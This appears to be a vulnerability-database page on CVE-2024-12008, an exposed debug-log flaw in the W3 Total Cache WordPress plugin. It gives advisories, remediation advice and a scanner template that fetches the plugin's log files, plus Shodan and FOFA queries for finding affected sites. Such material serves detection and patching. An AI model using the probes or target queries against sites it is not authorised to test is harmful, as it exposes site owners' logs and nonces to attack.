| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-12008 | 14 Jan 202507:10 | – | circl | |
| WordPress plugin W3 Total Cache 信息泄露漏洞 | 14 Jan 202500:00 | – | cnnvd | |
| CVE-2024-12008 | 14 Jan 202507:05 | – | cve | |
| CVE-2024-12008 W3 Total Cache <= 2.8.1 Information Exposure via Log Files | 14 Jan 202507:05 | – | cvelist | |
| CVE-2024-12008 | 14 Jan 202507:15 | – | nvd | |
| WordPress W3 Total Cache plugin <= 2.8.1 Information Exposure via Log Files vulnerability | 13 Jan 202520:12 | – | patchstack | |
| PT-2025-1728 | 14 Jan 202500:00 | – | ptsecurity | |
| CVE-2024-12008 | 23 May 202508:09 | – | redhatcve | |
| CVE-2024-12008 W3 Total Cache <= 2.8.1 Information Exposure via Log Files | 14 Jan 202507:05 | – | vulnrichment | |
| Wordfence Intelligence Weekly WordPress Vulnerability Report (January 13, 2025 to January 19, 2025) | 23 Jan 202515:41 | – | wordfence |
id: CVE-2024-12008
info:
name: W3 Total Cache < 2.8.2 - Log File Exposure
author: ritikchaddha
severity: medium
description: |
The plugin is vulnerable to Information Exposure through the publicly exposed debug log file. This makes it possible for unauthenticated attackers to view potentially sensitive information in the exposed log file. For example, the log file may contain nonce values that can be used in further CSRF attacks.
impact: |
Unauthenticated attackers can extract sensitive credentials, leading to potential account compromise and further attacks.
remediation: |
Update the W3 Total Cache plugin to version 2.8.2 or later, which restricts access to debug log files. Additionally, disable debug logging in production environments and ensure .htaccess rules block direct access to the cache/log directory.
reference:
- https://wpscan.com/vulnerability/1685ca58-1622-433b-b561-304cb9d1bc56/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8292f23c-fb17-4082-9788-f643d1bb097e
- https://nvd.nist.gov/vuln/detail/CVE-2024-12008
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-12008
epss-score: 0.02169
epss-percentile: 0.80072
cwe-id: CWE-532
metadata:
verified: true
max-request: 3
vendor: boldgrid
product: w3-total-cache
framework: wordpress
shodan-query: http.component:"WordPress" http.component:"W3 Total Cache"
fofa-query: app="WordPress-W3-Total-Cache"
tags: cve,cve2024,wordpress,wp,wp-plugin,w3-total-cache,exposure,logs
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/cache/log/000000/pagecache.log"
- "{{BaseURL}}/wp-content/cache/log/000000/minify.log"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'regex("\\[[A-Za-z]{3}, \\d{2} [A-Za-z]{3} \\d{4} \\d{2}:\\d{2}:\\d{2} [+-]\\d{4}\\]", body)'
- 'contains(body, "[/] [-]")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100d4e8b8d7161be4a0b01123eb3bbf37dc8dbeaa081002a7ae3c839e3dba05ad3f02210097154e1323dd979a74097f01554a049ee8afdb5a43598c95cc35b20a35b084ef:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation